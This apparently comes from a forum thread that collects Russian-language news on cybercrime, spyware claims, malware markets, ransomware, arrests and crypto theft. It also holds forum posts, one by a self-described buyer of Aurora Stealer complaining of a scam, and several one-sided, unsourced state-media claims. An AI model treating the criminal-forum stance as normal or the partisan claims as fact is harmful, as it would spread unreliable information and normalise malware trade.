О смерти Каршкова рассказал Павел Мунтян, основатель анимационной студии Toonbox, известной по ютьюб-сериалу «Mr. Freeman». Создатель 1xBet умер в возрасте 42 лет.
Сергей Каршков родился в Киевской области в 1980 году. Он переехал в Брянск, где возглавлял отдел по борьбе с киберпреступностью в УВД Брянской области. В 2020 году Следственный комитет России объявил Каршкова в розыск по делу о незаконной организации и проведении азартных игр.
По версии следствия, Каршков и еще два жителя Брянска Дмитрий Казорин и Роман Семиохин создали 1xBet и в 2014-2019 годах в результате незаконной игорной деятельности заработали более 63 миллиардов рублей. Как сообщалось, Каршков в последние годы жил на Кипре.
source: meduza.io/news/2023/06/21/umer-odin-iz-sozdateley-1xbet-sergey- karshkov-v-rossii-ego-obvinyali-v-nezakonnoy-organizatsii-azartnyh-igr
Американские спецслужбы использовали iPhone для шпионажа в России
ФСБ России заявила, что обнаружила и пресекла разведывательную акцию американских спецслужб, которые использовали мобильные телефоны фирмы «Apple» для слежки за интересующими их лицами в России и за рубежом.
«В ходе обеспечения безопасности российской телекоммуникационной инфраструктуры выявлены аномалии, характерные только для пользователей мобильных телефонов «Apple» и обусловленные работой ранее неизвестного вредоносного программного обеспечения (ВПО), использующего предусмотренные производителем программные уязвимости»
ФСБ утверждает, заражению подверглись несколько тысяч телефонных аппаратов этой марки. При этом кроме отечественных абонентов выявлены факты заражения зарубежных номеров и абонентов, использующих sim-карты, зарегистрированные на диппредставительства и посольства в России, включая страны блока НАТО и постсоветского пространства, а также Израиль, САР и КНР.
Российские спецслужбы считают, что это доказывает тесное сотрудничество американской компании «Apple» с национальным разведсообществом США и опровергает заявления компании о защите конфиденциальности персональных данных пользователей устройств «Apple».
"Компания предоставляет американским спецслужбам широкий спектр возможностей по контролю как за любыми лицами, представляющими интерес для Белого дома, включая их партнеров по антироссийской деятельности, так и за собственными гражданами", - пришла к выводу спецслужба.
source: fsb.ru/fsb/press/message/single.htm%21id%3D10439739%40fsbMessage.html
ЦРУ опубликовало видео с призывом совершить госизмену и раскрыть все тайны экономики России.
ЦРУ США создало собственный Telegram-канал , который позволит Агентству связываться с людьми в странах, где доступ к социальным или независимым СМИ ограничен или отсутствует.
Первым постом агентства на канале было видео на русском языке, в котором «смелым россиянам» предлагается анонимно связаться с агентством и поделиться информацией об экономике или руководстве России.
«Вы военный? Вы работаете в разведке, дипломатии, науке, высоких технологиях или имеете дело с людьми, которые этим занимаются? У вас есть информация об экономике или высшем руководстве Российской Федерации?», - говорится в видеоролике с призывом связаться с ЦРУ и поделиться имеющейся информацией.
Также ЦРУ предоставило свои контакты для связи в сети TOR. Стоит отметить, что в 2019 году ЦРУ установило присутствие в даркнете, чтобы люди могли безопасно связываться с Агентством через браузер TOR.
На данный момент у Telegram-канала ЦРУ около 12 000 подписчиков, что, по словам официального представителя МИД России Марии Захаровой, делает канал «очень удобным ресурсом для отслеживания заявителей».
Зампред по информационной политике Антон Горелкин считает, что свобода, которую дарует даркнет превратилась во вседозволенность, которой пользуются множество анонимных негодяев. Браузер Tor, который используется для доступа в даркнет, Горелкин назвал военной разработкой США и финансируется Госдепом.
Депутат считает, что нужно объявить даркнет вне закона, чтобы чётко обозначить его криминальную сущность. Пользователям Tor в качестве VPN-сервиса Горелкин предложил задуматься о замене.
В ходе трансграничной операции были захвачены сервер и домен преступников, а также проведено 142 ареста.
В результате скоординированных усилий правоохранительных органов был ликвидирован iSpoof – онлайн-сервис, который предоставлял своим подписчикам возможность анонимно звонить с подменных номеров, отсылать записанные сообщения и перехватывать одноразовые пароли. Согласно отчету Европола, злоумышленники пользовались сервисом, чтобы обманывать доверчивых пользователей, выдавая себя за сотрудников клиентских служб банков, интернет- магазинов и правительственных учреждений.
По оценкам службы службы столичной полиции Великобритании, ущерб от деятельности iSpoof превысил 115 млн евро (около $120 млн), причем число потенциальных жертв только в Великобритании превысило 200 тысяч.
Среди 142 арестованных оказался администратор сайта, который был задержан в Великобритании 6 ноября 2022 года. Сайт и сервер сервиса были захвачены и отключены от сети украинскими и американскими властями через два дня после задержания.
А началось все с того, что Национальная полиция Нидерландов нашла серверы iSpoof в городе Алмере. Затем правоохранители установили прослушку на серверах и получила ценную информацию о работе сервиса, что помогло арестовать первых подозреваемых – двух мужчин 19 и 22 лет, проживающих в Алмере. После этого удалось выяснить, что оператор iSpoof находится в Лондоне.
В задержании участвовали судебные и правоохранительные органы Австралии, Канады, Франции, Германии, Ирландии, Литвы, Нидерландов, Украины, Великобритании и США.
source:
europol.europa.eu/media-press/newsroom/news/action-against-criminal-website-
offered-%E2%80%98spoofing%E2%80%99-services-to-fraudsters-142-arrests
news.met.police.uk/news/more-than-100-arrests-in-uks-biggest-ever-fraud-
operation-457840
Русские хакеры взломали «Новую почту» Украины, которая обеспечивала транспортировку западной помощи ВСУшникам
Украинская «Новая пошта», с помощью которой киевским формированиям доставляли «волонтерскую» помощь в виде тепловизоров и дронов, заявила о «техническом сбое». При этом «гражданский сервис» умолчал, что неполадки произошли из-за атаки русских хакеров. В результате кибератаки уничтожены сотни серверов, которые обеспечивали работоспособность почты, в том числе и базы данных.
К слову, именно через «Новую почту» осуществлялась поставка британских БМП Bradley и немецких танков Leopard. Теперь логистика украинской армии нарушена еще больше, а полученные базы позволят выявить конкретных лиц, поставляющих ВСУшникам военное оборудование
.
Aurora Stealer обманул всех своих пользователей на 50,000$. Честно я не знаю даже что и сказать, так как я тоже был пользователем Aurora Stealer и Aurora Botnet. Вчера только купил рекламу у данного проекта, по итогу, как я понял, ее никто не сделает. Может что-то будем делать с этим, товарищи? Меня лично обманули тоже на 1500$. Напишите свое мнение в комментариях, стоит ли разбираться в данной ситуации?
Вообще летает некая версия того, что Aurora все таки приняли, мне даже верится в это больше.
Давайте посмотрим на данную ситуацию с другой стороны:
— Aurora Stealer (5-10к$)
— Aurora Botnet (40-45к$)
Стиллер приносил не больше 5.000$ в месяц, это мое мнение.
Ботнет принес на данный момент не более 45.000$.
У людей есть весь доступ к логам, если бы они хотели заскамить, сделали бы это чуть умнее, согласитесь.
Чуть позже, я опубликую много информации, пока что я в ней не уверен.
Пишите свое мнение в комментариях, свои догадки, будем рассматривать и обсуждать.
Чаты Авроры удалили.Click to expand...
Службы безопасности совместно с БЭБ заблокировали в Полтаве мощный прокси- центр, который агрессор использовал для подрывной деятельности против Украины.
В результате комплексных мероприятий задержаны организаторы незаконной деятельности. Ими оказались двое жителей Полтавской и Харьковской областей.
Дельцы наладили подпольный прокси-центр, который работал как VPN-сервис. Он позволял абонентам из любой страны выдавать себя за пользователей украинского мобильного Интернета.
Стоимость такой «подписки» составляла почти 2,5 тыс. грн в месяц.
По оперативной информации, фигуранты ежедневно получали сотни «заказов», а деньги получали через запрещенные платежные системы.
Среди «постоянных» клиентов были граждане РФ, которые через услуги прокси- центра пытались скрыть собственные ИР-адреса для доступа к популярным соцсетям.
При этом серверы вражеской «ячейки» находились на территории страны-агрессора.
Это позволяло российским спецслужбам получать удаленный доступ к украинскому интернет-пространству, а также распространять кремлевские нарративы и фейковую информацию о ситуации на фронте якобы от имени украинских граждан.
Во время обысков по местам пребывания злоумышленников обнаружено:
▪ специальный аппаратный комплекс;
▪ 120 тыс. долл. и пол килограмма золота;
▪ Мобильные телефоны и черновые записи с доказательствами незаконной
деятельности.
Сейчас организатору прокси-центра сообщено о подозрении по ч. 2 ст. 200 Уголовного кодекса Украины (незаконные действия с документами на перевод, платежными карточками и другими средствами доступа к банковским счетам, электронными деньгами, оборудованием для их изготовления).
Продолжаются следственные действия для установления всех обстоятельств преступления и привлечения виновных к ответственности.
Мероприятия по разоблачению правонарушения проводили сотрудники СБУ совместно с Территориальным управлением БЭБ в г. Киеве и Киевской области при процессуальном руководстве Офиса Генерального прокурора.
Но не спешите выдвигаться на поиски, ключ спрятан на расстоянии 200 000 миль на Луне.
Все, что нужно охотникам за сокровищами, — это найти способ преодолеть более 200 000 миль в космосе, а затем приземлиться на поверхность Луны. Это потому, что позже в этом году ракета SpaceX доставит на Луну небольшой луноход размером с микроволновую печь. Тщательно прикрепленный к марсоходу: закодированный ключ, способный открыть небольшое состояние, 62 биткойна.
Сейчас 62 биткойна равняются почти 1,8 миллиона долларов. Но к тому времени, когда кому-то удастся скопировать ключ с марсохода, цифровое сокровище может стоить гораздо больше, утверждает один из руководителей проекта.
InTheBox продает ПО для атак на более 300 финансовых систем и соцсетей в 43
странах.
Исследователи ИБ-компании Resecurity обнаружили новый рынок в даркнете ,
ориентированный на разработчиков и операторов мобильных вредоносных программ.
Торговая площадка под названием «InTheBox» работала в сети TOR по крайней мере
с мая 2020 года, и с тех пор она превратилась из частного маркета в крупнейшую
торговую площадку, предлагающая огромное количество уникальных инструментов и
веб-инжекты.
Эксперты Resecurity назвали InTheBox крупнейшим и наиболее значимым источником банковских краж и мошенничества с использованием мобильных устройств. Большинство мобильных вредоносных программ, поддерживаемых InTheBox, ориентированы на Android устройства.
В настоящее время киберпреступники предлагают на продажу более 1850 вредоносных инструментов, предназначенных для целевых систем из более 45 стран:
Компании, на которые нацелены киберпреступники, включают Amazon, PayPal, Citi,
Bank of America и т.д.

Операторы торговой площадки InTheBox тесно связаны с разработчиками основных
семейств мобильных вредоносных программ, в том числе Alien , Cerberus , ERMAC
, Octopus ( Octo ) и другие.
Киберпреступники могут арендовать готовое вредоносное ПО за абонентскую плату
в размере от $2500 до $7000 или заказать индивидуальную разработку веб-
инжектов для определенных служб или приложений. Сегодня «InTheBox»
предоставляет доступ к более чем 400 профессионально разработанным веб-
инжектам, классифицированным по географическому признаку и целевому
назначению.

InTheBox был обнаружен подразделением HUNTER компании Resecurity, которое
выявляет правительственных хакеров и злоумышленников отраслевых партнеров.
Специалисты передали информацию в Центр обмена информацией и анализа
финансовых услуг (FS-ISAC) и группе безопасности Google, чтобы они могли
разработать сигнатуры и тактики для надлежащей защиты мобильных устройств.
The FBI Has Been Buying Bulk Internet Data from This Florida Company
A data broker that previously sold data-pilfering tools to the U.S. military has received tens of thousands of dollars from the FBI for similar services
The FBI’s cybersecurity division has been purchasing bulk internet data from a little-known tech firm based in Florida, Motherboard [reports](https://www.vice.com/en/article/dy3z9a/fbi-bought-netflow-data- team-cymru-contract). Team Cymru, which calls itself a “global leader in cyber threat intelligence,” sells access to bulk web traffic and claims it can provide clients access to a “super majority of all activity on the internet.” It has previously been found selling its services to a number of other federal agencies.
Motherboard came into the details of the FBI’s contract with the company via a Freedom of Information Act request. The 4-page FOIA document is heavily redacted and doesn’t given much away about the broader purpose of the bureau’s data acquisition. However, it does show that, in 2017, the government paid a total of $76,450 for the information haul. Just what the bureau’s Cyber Division ended up doing with that data isn’t exactly clear, although Motherboard [notes](https://www.vice.com/en/article/dy3z9a/fbi- bought-netflow-data-team-cymru-contract) that the data in question is what is known as “netflow” data, which, in some cases, can allegedly be used to track cybercriminal activity. Companies like Cymru typically purchase the data from internet service providers, then resell it to law enforcement agencies, Motherboard states.
The FBI isn’t the first federal agency to be found purchasing data from Team Cymru. Last September, it was [reported](https://gizmodo.com/ncis- whistleblower-military-data-broker-cymru-wyden-1849564984) that multiple agencies within the U.S. military had spent millions of dollars to procure a powerful internet monitoring tool from the Florida firm, dubbed “Augury.” According to advertising materials, Augury allows a user access to bulk internet traffic logs. In some cases, the data being provided could include “access to people’s email data, browsing history, and other information such as their sensitive internet cookies,” the outlet reported.
Until recently, Cymru also apparently had a relationship with a somewhat less obvious partner: the internet’s most well-known [privacy browser](https://gizmodo.com/the-tor-web-browser-officially-lands-on- android-in-alph-1828895328), Tor.
G/O Media may get a commissionIndeed, last year, Tor users began to question why the project appeared to have an infrastructure partnership with the creepy Florida company. “Why is Tor being hosted on Team Cymru’s network, a data broker known to sell internet backbone data to companies [?],” one forum user [questioned](https://forum.torproject.net/t/why-is-torproject-org-hosted-on- team-cyru-servers/3452), in May of 2022. The user posted a screenshot that appeared to show a DNS lookup of the Tor project that tracked back to Team Cymru. Another user pointed out that [Rabbi Rob Thomas](https://www.hagerty.com/media/automotive-history/the-tank-rabbi- gulf-war-vet-deploys-wwii-armor-to-tell-its-story/), the CEO of the company, appeared to be a member of the Tor Project’s board of directors.
In October of 2022, after Cymru’s contract with the U.S. military was publicly revealed, Tor officially [announced](https://blog.torproject.org/role-tor-project-board-conflicts- interest/) it would be halting its partnership with the data broker. Previously, Cymru had provided “hardware and other resources” to the privacy network, according to Tor Project executive director Isabela Fernandes. It’s unclear just how extensive that partnership was—or what, exactly, it was being used for. Citing “conflicts of interest,” Fernandes announced that Tor no longer found it “tenable to continue to accept Team Cymru’s donations of infrastructure.”
Click to expand...

Company ](https://gizmodo.com/team-cymru-fbi-data-collection-internet- surveillance-to-1850269719)
A data broker that previously sold data-pilfering tools to the U.S. military has received tens of thousands of dollars from the FBI for similar services.
 gizmodo.com
"В Москву прибыла группа китайских специалистов по киберугрозам в составе 41
человека.
Подтверждается информация о предметном
взаимодействии спецслужб России и Китая по итогам визита председателя Си
Цзиньпина в Москву.
Как стало известно «Октагону», в совместном с российской стороной проекте
китайскими коллегами будет произведен анализ и подготовлена техническая
дорожная карта по полной блокировке YouTube.
Часть технологий от комплекса «великой
китайской firewall» предоставит НОАК КНР, остальное будет базироваться на
российских и белорусских разработках. Блокировка YouTube согласно графику
будет возможна в 4 квартале 2023 года. Затем будет доступна работа по
блокировке всех типов VPN. Пилотный проект по блокировке может осуществить
«Ростелеком», а в случае успеха – все частные и полугосударственные
провайдеры."
@octagonmedia
Хотелось бы услышать мнение благородных донов, как сие обходить... Или никак
уже?)
Хотелось бы заблаговременно подстелить, так сказать..
А то тут не все же со старлинков сидят
Из Грузии в США экстрадирован гражданин РФ, разыскиваемый ФБР, сообщает прокуратура Грузии, не называя имя подозреваемого. Россиянин был задержан 22 октября 2022 года в Кобулети, согласно информации США, в 2016–2019 годах он через взлом компьютерных систем получил доступ к данным в том числе жителей Флориды.
«В результате указанных действий обвиняемый получил доход в размере около 1 000 000 лари»,— говорится в сообщении грузинского ведомства от 13 марта.
Если перевести 1 млн лари в доллары США, то по курсу на сегодня, 13 марта, получится чуть более $383 тыс.
В сообщении прокуратуры Грузии также содержится ссылка на информацию Минюста США, в которой говорится об экстрадиции россиянина Дария Панкова, подозреваемого в хакерстве и задержанного в Грузии 4 октября 2022 года.
«Согласно обвинительному заключению, Панков разработал вредоносную программу NLBrute. Мощное вредоносное ПО было способно скомпрометировать защищенные компьютеры путем расшифровки учетных данных для входа, таких как пароли»,— сообщало американское ведомство 22 февраля. По данным Минюста США, Дарий Панков передал учетные данные более чем 35 тыс. скомпрометированных компьютеров для продажи на веб-сайте и получил незаконный доход в размере более $350 тыс.
Если Дария Панкова признают виновным по всем пунктам обвинения, ему грозит максимальное наказание в виде 47 лет лишения свободы в федеральной тюрьме. Указаний на его связь с задержанным 22 октября гражданином РФ в сообщениях грузинского и американского ведомств нет.
source: pog.gov.ge/news/saqarTvelodan-amerikis-sheerTebul-shtatebshi-ashsh-s- gamoZiebis-federaluri-biuros-mier-Zebnili-piris
поторопился и поменял их на 0.05 usdt
Специалисты Palo Alto Networks заметили, что шифровальщик Thanos обзавелся новой функциональностью и пытается вносить изменения в MBR (Master Boot Record) на зараженных машинах, чтобы воспрепятствовать нормальному запуску системы.
В частности такое поведение вредоноса было зафиксировано в июле 2020 года, во время двух атак на госучреждения на Ближнем Востоке и Северной Африке. К счастью, авторы малвари допустили ошибку в коде, и MBR пострадавших систем остается целым.
«Перезапись MBR — это более деструктивный подход к вымогательским атакам. Жертвам придется приложить больше усилий, чтобы восстановить свои файлы, даже если они заплатят выкуп. К счастью, в данном случае код, отвечающий за перезапись MBR, не срабатывал, так как сообщение с требованием выкупа [которое должно выводиться на экране блокировки] содержало недопустимые символы», — рассказывают аналитики Palo Alto Networks.
Click to expand...
Хотя перезаписать MBR малвари не удалось, во время упомянутых атак операторы Thanos создали на зараженных машинах обычные текстовые файлы HOW_TO_DECIPHER_FILES.txt и потребовали у своих жертв 20 000 долларов за восстановление данных. При этом у экспертов нет информации о том, согласились ли пострадавшие на уплату выкупов.
Вымогательское послание Thanos
Исследователи полагают, что злоумышленники проникли в целевые сети задолго до развертывания пейлоадов вымогателя, так как в образцах, восстановленных после атаки, удалось обнаружить действительные учетные данные.
Thanos представляет собой RaaS (Ransomware-as-a-Service), который активно рекламируется на русскоязычных хакерских форумах с февраля 2020 года. Некоторые образцы Thanos также фигурировали в отчетах экспертов под названием Hakbit (из-за различных расширений, который шифровальщик оставляет после себя), но исследователи из Recorded Future пишут, что это была одна и та же малварь.
Схема атаки вымогателя
Click to expand...
Источник: xakep.ru/2020/09/07/thanos/
В конце 2022 года после сделки по продаже криптовалюты на 900 000 рублей и получения средств на карту, на карту человека прилетел арест по уголовному делу, он обратился в суд, вынесший арест, получил постановление, где говорилось, что арест наложен по уголовному делу о мошенничестве. Человек продавал крипту и имел на руках все доказательства, посему совершенно спокойно обратился в районный отдел МВД с целью объяснить следователю, что он не при чем и чтобы следователь снял арест.
При первом появлении у следователя его задержали, забрали телефон, не давали связаться с родственниками. Человека убеждали, что он — участник преступной схемы, якобы в сговоре с теми, кто обманывал потерпевшую по этой сделке.
В итоге человека вывели на мысли, что раз он «допускал», что при продаже кодов или крипты он «может» получить деньги, полученные в результате мошенничества — то он пособник в мошенничестве.
В итоге суд признал трейдера виновным в совершении преступления, предусмотренного ч.5 ст. 33, ч. 3 ст. 159 УК РФ, и назначил ему наказание в виде 2 лет лишения свободы.
Сотрудники испанских правоохранительных органов арестовали 16 человек, связанных с использованием банковских троянов Mekotio и Grandoreiro в рамках вредоносной кампании, нацеленной на финансовые учреждения в Европе.
Аресты были произведены в Рибейре (Ла-Корунья), Мадриде, Парла и Мостолес (Мадрид), Сесенья (Толедо), Вильяфранка-де-лос-Баррос (Бадахос) и Аранда-де- Дуэро (Бургос) в ходе операции Aguas Vivas. Как сообщили в полиции, с помощью вредоносного программного обеспечения, установленного на компьютере жертвы, преступники могли переводить большие суммы денег на свои счета.
Полиция конфисковала компьютерное оборудование, мобильные телефоны и документы, а также проанализировала более 1,8 тыс. спам-писем, что позволило правоохранительным органам успешно заблокировать попытки транзакций на общую сумму 3,5 млн евро. Доходы преступников составили 276 470 евро, из которых 87 тыс. евро были успешно возвращены.
Кибермошенники отправляли потенциальным жертвам фишинговые электронные письма якобы от имени легитимных служб доставки и государственных органов, таких как Казначейство Испании. В письмах пользователей просили перейти по ссылке, которая незаметно загружала вредоносное программное обеспечение на компьютерную систему.
Вредоносы Mekotio и Grandoreiro позволяют операторам перехватывать транзакции на web-сайте банка и несанкционированно перенаправлять средства на счета, находящиеся под контролем злоумышленников. Для осуществления мошеннических целей преступники взломали по меньшей мере 68 учетных записей электронной почты, принадлежащих официальным органам.
Grandoreiro и Mekotio (также известный как Melcoz) являются частью семейства бразильских банковских троянов, включающего также вредоносное ПО Guildma и Javali. Действующий по крайней мере с 2016 года, Grandoreiro использовался для атак на пользователей в Бразилии, Мексике, Испании, Португалии и Турции. Mekotio, с другой стороны, был замечен в атаках, нацеленных на Бразилию, начиная с 2018 года, а затем операторы начали атаковать пользователей в Чили, Мексике и Испании.
Mekotio позволяет похищать пароли из браузеров и памяти устройства, обеспечивая удаленный доступ к операциям интернет-банкинга. Вредонос также содержит функционал для кражи адресов биткойн-кошельков.
• Source: http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853
Недавно стало известно, что россиянин Максим Мернес оказался в тюрьме Таиланда. А сегодня в СМИ появилась страшная новость — мужчину убили.
Молодой человек стал популярен в узких кругах благодаря рекламе криптовалют. Однако широкую известность он получил, назвав себя внебрачным сыном Сергея Мавроди — создателя печально известной финансовой пирамиды «МММ». Стоит отметить, что знаменитый махинатор никогда не заявлял о существовании наследника, рожденного вне официально оформленных отношений.
Последние годы Мернес жил в Таиланде и активно призывал подписчиков вкладывать средства в криптовалюты, обещая легкий заработок. Переезд к солнечным пляжам, высоким пальмам и ласковому морю он объяснял поклонникам своей прозорливостью, якобы криптомиллионер вовремя купил биткоины, которые в несколько раз поднялись в цене.
Никто не может понять, что случилось с Максимом.
Некоторое время назад Мернес в личном блоге обратился к подписчикам с неожиданной просьбой. Бизнесмену срочно понадобились деньги, чтобы выйти из тайской тюрьмы под залог. Внебрачный сын Мавроди уверял, против него сфабриковано дело и, возможно, следующие пять лет ему придется провести в иностранном казенном доме.
По имеющейся информации, Максима задержали за нападение на бизнес-партнера — мужчина кинулся на товарища с ножом. Адвокат Мернеса Александр Парфенов не дал комментарии, а посольство РФ в Бангкоке отказалось рассказывать журналистам нюансы дела без письменного запроса.
Следственные органы Таиланда ведут расследование. Обстоятельства гибели гражданина РФ выясняются. По одной из предварительных версий, причиной смерти Мернеса мог стать конфликт с заключенным. Еще одно предположение, которое выдвинули правоохранительные структуры — заказное убийство.
Ахад Шамс, соучредитель стартапа Webaverse, обнаружил в конце ноября 2022 года, что с его криптовалютного счёта было украдено 4 миллиона долларов. Злоумышленники сделали это прямо во время личной встречи с жертвой.
В подробном заявлении Шамс рассказал, как преступники выдавали себя за инвесторов, несколько недель вели переговоры, организовали встречу в Риме, а затем похитили деньги неизвестным образом. «Мы еще не на 100 процентов уверены в том, как технически это произошло. Мошенники убедили нас перевести средства на новый кошелек. Мы сами его создали и полностью контролировали. Так мы должны были доказать им, что у нас есть деньги», — написал Шамс.
В вышеупомянтом заявлении Шамс очень подробно рассказал, как злоумышленники вышли на него и осуществили задуманное. Ниже постараемся передать основную суть в более сжатой форме.
С Ахадом Шамсом по электронной почте связался адвокат. Он представлял интересы потенциального инвестора — Джозефа Сафры. Электронное письмо было от существующей юридической организации с действующим сайтом, Шамс не заметил какого-либо подвоха на этом этапе. Затем адвокат отправил ему информацию о своём клиенте Джозефе. Как выяснилось позже, данные о нём оказались поддельными.
После нескольких недель переговоров по электронной почте и видеосвязи Шамс согласился встретиться с Сафрой и его адвокатом в Риме. Сафра заранее предупредил, что ему нужно будет подтверждение наличия у Шамса средств на реализацию проекта. По словам Сафры, учетная запись в криптокошельке Trust Wallet была бы достаточным доказательством.
Шамс создал новый кошелёк в Trust Wallet будучи ещё дома, используя своё личное устройство и находясь в домашней Wi-Fi сети. «Мы сели напротив этих людей и перевели 4 миллиона долларов США (USD Coin) в свой собственный кошелёк Trust Wallet. Мистер Сафра попросил посмотреть баланс кошелька и достал телефон, чтобы сделать несколько снимков. При этом никакой информации для совершения перевода, по типу "начальных фраз" или "закрытых ключей" ему показано не было», — написал Шамс.
Сафру всё устроило, но ему нужно было ненадолго выйти, чтобы обсудить всё со своими коллегами. Он спешно удалился и затем пропал. «Мы больше никогда его не видели. Через несколько минут средства покинули кошелек. Я был в шоке… Я понятия не имел, как эти ребята украли у нас деньги», — сообщил Шамс.
О факте кражи сразу сообщили в полицию Рима, а также в ФБР. Продолжающееся до сих пор официальное расследование, как и параллельное, проведённое частным адвокатом, — не определило точно, как именно была украдена криптовалюта.
Отмывание украденных денег было масштабным. Следователи отследили перемещения средств в блокчейне и обнаружили очень длинную цепочку. Средства, снятые с кошелька Шамса, были разделены на шесть транзакций, которые были отправлены на шесть ранее неиспользуемых адресов. Почти все USDC были конвертированы в Ethereum (ETH), Wrapped Bitcoin (wBTC) и Tether (USDT), а затем пропущены через 14 других кошельков. Оттуда средства были отправлены ещё на четыре новых кошелька. Около 83% средств в настоящее время находятся на одном из этих адресов.
Это далеко не первый случай подобного мошенничества. В 2021 году NFT- предприниматель Джейкоб Риглин, основатель Dream Lab, сообщил в Twitter , что у него было украдено 90 тысяч долларов в криптовалюте по аналогичной схеме. Это произошло во время личной встречи в Барселоне. Риглина так же уговорили открыть новый криптокошелек, перевести туда валюту и показать потенциальным «инвесторам». К концу встречи денег на счёте уже не было. Конечно, 90 тысяч и 4 миллиона — суммы несопоставимые, однако на лицо факт, что мошенники уже давно используют такую схему.
Ахад Шамс, герой вышеописанной эпопеи, сообщил, что, кража криптовалюты нанесла серьёзный ущерб его компании, но не сломила его. Webaverse имеет достаточно денег на следующие 12-16 месяцев и надеется собрать ещё больше. Расследование продолжается, а участники этой истории смотрят в будущее.
(Автоматический перевод)
Предлагаемый закон ЕС о контроле чатов не только установит тоталитарный контроль над всеми частными коммуникациями. Он также запретит операционные системы с открытым исходным кодом как непреднамеренное следствие.
В настоящее время ЕС находится в процессе принятия закона о контроле чатов. Его критикуют за создание централизованной системы массового наблюдения и цензуры в масштабах всего ЕС и за возможность правительственного прослушивания всех частных коммуникаций. Но одним из мало обсуждаемых последствий предлагаемого закона является то, что он делает практически все существующие операционные системы с открытым исходным кодом незаконными, включая все основные дистрибутивы Linux. Он также фактически запрещает архив приложений для Android с открытым исходным кодом F-Droid.
Статья 6 закона требует от всех "магазинов программных приложений":
Оставив в стороне то, насколько безумными являются заявленные намерения или детали того, какое программное обеспечение будет объектом проверки, давайте рассмотрим последствия для систем программного обеспечения с открытым исходным кодом.
Статья 2 определяет "магазин программных приложений" как "вид посреднических онлайн-услуг, ориентированных на программные приложения в качестве посреднического продукта или услуги".
Это явно охватывает онлайновые архивы программного обеспечения, почти повсеместно используемые операционными системами с открытым исходным кодом с 1990-х годов в качестве основного метода распространения приложений и обновлений безопасности. Эти архивы часто создаются и поддерживаются небольшими компаниями или добровольными ассоциациями. Они размещаются в сотнях организаций, таких как университеты и интернет-провайдеры по всему миру. Один из основных, управляемый добровольцами архив пакетов Debian, в настоящее время содержит более 170 000 пакетов программного обеспечения.
Эти службы архива программного обеспечения не построены на концепции отдельного пользователя, имеющего личность или учетную запись. Они обслуживают анонимные машины, такие как ноутбук, сервер или устройство. Эти машины могут использоваться или не использоваться отдельными пользователями для установки приложений, что совершенно не зависит от архивных служб.
Чтобы даже концептуально и теоретически иметь возможность подчиниться этому закону, потребуется полная перестройка установки программного обеспечения, поиска источников и обновления безопасности, серьезная организационная реструктуризация и слом, централизация и восстановление инфраструктуры распространения программного обеспечения.
Конечно, это только теоретически, поскольку затраты и практические проблемы будут непреодолимыми.
Если и когда этот закон вступит в силу, он сделает незаконными услуги программного обеспечения с открытым исходным кодом, лежащие в основе большинства услуг и инфраструктуры в Интернете, несметного количества приборов и компьютеров, используемых разработчиками программного обеспечения, а также многих других вещей. Чтобы соответствовать закону, все это пришлось бы закрыть, причем глобально, поскольку серверы, предоставляющие программное обеспечение и обновления безопасности, не могут отличить веб-сервер, японского разработчика программного обеспечения, холодильник и подростка из ЕС.
Может показаться невероятным, что авторы закона не подумали об этом, но это не так уж удивительно, учитывая, что это лишь одно из многих гигантских последствий этого небрежно продуманного и написанного закона.
[*] Для определения магазина программных приложений закон ссылается на Закон ЕС о цифровых рынках, статья 2, пункт 12, в котором дается определение "виртуального помощника". На самом деле они имеют в виду пункт 14, в котором дается определение "магазина программных приложений".
Spoiler: Оригинал
The proposed Chat control EU law will not only seize totalitarian control of
all private communication. It will also ban open source operating systems as
an unintended consequence.
The EU is currently in the process of enacting the chat
control law. It has been criticized for creating an
EU-wide centralized mass surveillance and censorship system and enabling
government eavesdropping on all private communication. But one little talked
about consequence of the proposed law is that it makes practically all
existing open source operating systems illegal, including all major Linux
distributions. It would also effectively ban the F-Droid open source Android
app archive.
Article 6 of the[law](https://eur-lex.europa.eu/legal-
content/EN/TXT/?uri=COM%3A2022%3A209%3AFIN&qid=1652451192472) requires all
"software application stores" to:
Leaving aside how crazy the stated intentions are or the details of what
software would be targeted, let's consider the implications for open source
software systems.
A "software application store" is defined by Article 2[] to mean "a type of
online intermediation services, which is focused on software applications as
the intermediated product or service".
This clearly covers the online software archives almost universally used by
open source operating systems since the 1990s as their main method of
application distribution and security updates. These archives are often
created and maintained by small companies or volunteer associations. They are
hosted by hundreds of organizations such as universities and internet service
providers all over the world. One of the main ones, the volunteer run Debian
package archive, currently contains over 170,000 software packages.
These software archive services are not constructed around a concept of an
individual human user with an identity or an account. They are serving
anonymous machines, such as a laptop, a server or an appliance. These machines
then might or might not be used by individual human users to install
applications, entirely outside the control of the archive services.
To even conceptually and theoretically be able to obey this law would require
a total redesign of software installation and sourcing and security updates,
major organizational restructuring and scrapping, centralizing and rebuilding
the software distribution infrastructure.
This is of course only theoretical as the costs and practical issues would be
insurmountable.
If and when this law goes into effect it would make illegal the open source
software services underpinning the majority of services and infrastructure on
the internet, an untold numbers of appliances and the computers used by
software developers, among many other things. To comply with the law all of it
would have to shut down, globally, as the servers providing software and
security updates can't tell the difference between a web server, a Japanese
software developer, a refrigerator and an EU teenager.
It may seem unbelievable that the authors of the law didn't think about this
but it is not that surprising considering this is just one of the many
gigantic consequences of this sloppily thought out and written law.
_[] To define a software application store the law makes a reference to
the[EU Digital Markets Act](https://eur-lex.europa.eu/legal-
content/EN/TXT/?uri=CELEX%3A32022R1925), Article 2, point 12 which defines
“virtual assistant”. What they actually mean is point 14, which does define
“software application store”._
Источник: <https://mullvad.net/en/blog/2023/2/1/eu-chat-control-law-will-ban- open-source-operating-systems/>
Используя вредоносное ПО, хакеры криптовали данные и требовали выкуп за восстановление доступа. От противоправных действий пострадало более 50 компаний в странах Европы и Америки. Ущерб достигает более миллиона долларов США.
Деятельность хакерской группы разоблачили сотрудники Департамента киберполиции совместно с Главным следственным управлением Нацполиции, работниками СБУ и в сотрудничестве с коллегами из Великобритании и США.
Организатор группы 36-летний киевлянин совместно с женой и тремя знакомыми совершал кибератаки на иностранные компании.
Используя вредоносное ПО типа Ransomware, фигуранты криптовали данные пострадавших. Вирус-вымогатель попадал на технику путём спам-рассылок на электронные ящики. Выкуп за восстановление доступа к данным получали три исполнителя на собственные криптогаманцы.
По предварительным данным, от атак пострадали более 50 компаний, общая сумма ущерба достигает более миллиона долларов США.
Кроме этого, по заказу иностранных хакеров фигуранты оказывали услуги по замене IP-адресов пользователей. Как следствие, последние имели возможность скрыто осуществлять противоправную деятельность.
